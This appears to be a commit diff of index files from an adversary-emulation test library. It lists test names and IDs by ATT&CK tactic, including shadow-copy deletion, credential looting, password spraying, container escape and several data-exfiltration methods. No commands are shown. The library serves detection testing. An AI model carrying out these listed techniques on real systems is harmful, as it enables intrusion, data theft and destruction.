1028 discovery T1057 Process Discovery 6 Discover Specific Process - tasklist 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb command_prompt
1029 discovery T1069.001 Permission Groups Discovery: Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
1030 discovery T1069.001 Permission Groups Discovery: Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
1031 discovery T1069.001 Permission Groups Discovery: Local Groups 4 SharpHound3 - LocalAdmin e03ada14-0980-4107-aff1-7783b2b59bb1 powershell
1032 discovery T1069.001 Permission Groups Discovery: Local Groups 5 Wmic Group Discovery 7413be50-be8e-430f-ad4d-07bf197884b2 powershell
1033 discovery T1069.001 Permission Groups Discovery: Local Groups 6 WMIObject Group Discovery 69119e58-96db-4110-ad27-954e48f3bb13 powershell
1034 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
1035 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
1036 discovery T1201 Password Policy Discovery 8 Get-DomainPolicy with PowerView 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 powershell
1037 discovery T1201 Password Policy Discovery 9 Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy b2698b33-984c-4a1c-93bb-e4ba72a0babb powershell
1038 discovery T1201 Password Policy Discovery 10 Use of SecEdit.exe to export the local security policy (including the password policy) 510cc97f-56ac-4cd3-a198-d3218c23d889 command_prompt
1039 discovery T1614.001 System Location Discovery: System Language Discovery 1 Discover System Language by Registry Query 631d4cf1-42c9-4209-8fe9-6bd4de9421be command_prompt
1040 discovery T1614.001 System Location Discovery: System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
1041 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
1042 discovery T1012 Query Registry 2 Query Registry with Powershell cmdlets 0434d081-bb32-42ce-bcbb-3548e4f2628f powershell
1043 discovery T1012 Query Registry 3 Enumerate COM Objects in Registry with Powershell 0d80d088-a84c-4353-af1a-fc8b439f1564 powershell
1044 discovery T1518.001 Software Discovery: Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
1045 discovery T1518.001 Software Discovery: Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
1046 discovery T1518.001 Software Discovery: Security Software Discovery 5 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
1047 discovery T1518.001 Software Discovery: Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
1048 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
1049 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
1050 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
1051 discovery T1018 Remote System Discovery 4 Remote System Discovery - ping sweep 6db1f57f-d1d5-4223-8a66-55c9c65a9592 command_prompt
1052 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
1053 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
1054 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
1055 discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
1056 discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
1057 discovery T1018 Remote System Discovery 15 Enumerate domain computers within Active Directory using DirectorySearcher 962a6017-1c09-45a6-880b-adc9c57cb22e powershell
1058 discovery T1018 Remote System Discovery 16 Enumerate Active Directory Computers with Get-AdComputer 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf powershell
1059 discovery T1018 Remote System Discovery 17 Enumerate Active Directory Computers with ADSISearcher 64ede6ac-b57a-41c2-a7d1-32c6cd35397d powershell
1060 discovery T1018 Remote System Discovery 18 Get-DomainController with PowerView b9d2e8ca-5520-4737-8076-4f08913da2c4 powershell
1061 discovery T1018 Remote System Discovery 19 Get-WmiObject to Enumerate Domain Controllers e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad powershell
1062 discovery T1018 Remote System Discovery 20 Remote System Discovery - net group Domain Controller 5843529a-5056-4bc1-9c13-a311e2af4ca0 command_prompt
1063 discovery T1046 Network Service Discovery 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
1064 discovery T1046 Network Service Discovery 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
1065 discovery T1046 Network Service Discovery 5 WinPwn - spoolvulnscan 54574908-f1de-4356-9021-8053dd57439a powershell
1066 discovery T1046 Network Service Discovery 6 WinPwn - MS17-10 97585b04-5be2-40e9-8c31-82157b8af2d6 powershell
1067 discovery T1046 Network Service Discovery 7 WinPwn - bluekeep 1cca5640-32a9-46e6-b8e0-fabbe2384a73 powershell
1068 discovery T1046 Network Service Discovery 8 WinPwn - fruit bb037826-cbe8-4a41-93ea-b94059d6bb98 powershell
1069 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
1070 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
1071 discovery T1518 Software Discovery 4 WinPwn - Dotnetsearch 7e79a1b6-519e-433c-ad55-3ff293667101 powershell
1072 discovery T1518 Software Discovery 5 WinPwn - DotNet 10ba02d0-ab76-4f80-940d-451633f24c5b powershell
1073 discovery T1518 Software Discovery 6 WinPwn - powerSQL 0bb64470-582a-4155-bde2-d6003a95ed34 powershell
1074 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
1075 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
1076 discovery T1124 System Time Discovery 4 System Time Discovery W32tm as a Delay d5d5a6b0-0f92-42d8-985d-47aafa2dd4db command_prompt
1077 discovery T1124 System Time Discovery 5 System Time with Windows time Command 53ead5db-7098-4111-bb3f-563be390e72e command_prompt
1078 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
1079 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
1080 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
1081 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
1082 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
1083 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
1084 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
1085 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
1086 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
1087 impact T1486 Data Encrypted for Impact 8 Data Encrypted with GPG4Win 4541e2c2-33c8-44b1-be79-9161440f1718 powershell
1088 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
1089 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
1090 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
1091 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
1092 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
1093 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
1094 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
1095 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
1096 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
1097 impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
1098 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
1099 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
1100 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
1101 impact T1529 System Shutdown/Reboot 10 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
1102 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
1103 initial-access T1566.001 Phishing: Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
1104 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
1105 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1106 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
1107 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1108 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
1109 initial-access T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
1110 initial-access T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
1111 initial-access T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
1112 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
1113 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 1 Exfiltrate data HTTPS using curl windows 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 command_prompt
1114 exfiltration T1041 Exfiltration Over C2 Channel 1 C2 Data Exfiltration d1253f6e-c29b-49dc-b466-2147a6191932 powershell
1115 exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
1116 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 1 Exfiltrate data with rclone to cloud Storage - Mega (Windows) 8529ee44-279a-4a19-80bf-b846a40dda58 powershell
1117 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
1118 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 4 Exfiltration Over Alternative Protocol - HTTP 6aa58451-1121-4490-a8e9-1dada3f1c68c powershell
1119 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 5 Exfiltration Over Alternative Protocol - SMTP ec3a835e-adca-4c7c-88d2-853b69c11bb9 powershell
1120 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 6 MAZE FTP Upload 57799bc2-ad1e-4130-a793-fb0c385130ba powershell
1121 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 7 Exfiltration Over Alternative Protocol - FTP - Rclone b854eb97-bf9b-45ab-a1b5-b94e4880c56b powershell
atomics/Indexes/Indexes-Markdown/azure-ad-index.md
-98
View File
@@ -1,98 +0,0 @@
# Azure AD Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1606.002 Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md)
- Atomic Test #1: Golden SAML [azure-ad]
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- Atomic Test #7: Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) [azure-ad]
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #2: Azure AD - Create a new user [azure-ad]
- Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #4: Azure AD - adding user to Azure AD role [azure-ad]
- Atomic Test #5: Azure AD - adding service principal to Azure AD role [azure-ad]
- Atomic Test #8: Azure AD - adding permission to application [azure-ad]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/containers-index.md
-89
View File
@@ -1,89 +0,0 @@
# Containers Atomic Tests by ATT&CK Tactic & Technique
# discovery
- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
- Atomic Test #1: Container and ResourceDiscovery [containers]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #9: Network Service Discovery for Containers [containers]
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
- Atomic Test #1: List All Secrets [containers]
- Atomic Test #2: ListSecrets [containers]
# persistence
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
- [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [containers]
- Atomic Test #2: Docker Exec Into Container [containers]
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.003 User Execution: Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [containers]
- Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1036.005 Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1612 Build Image on Host](../../T1612/T1612.md)
- Atomic Test #1: Build Image On Host [containers]
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/google-workspace-index.md
-101
View File
@@ -1,101 +0,0 @@
# Google Workspace Atomic Tests by ATT&CK Tactic & Technique
# credential-access
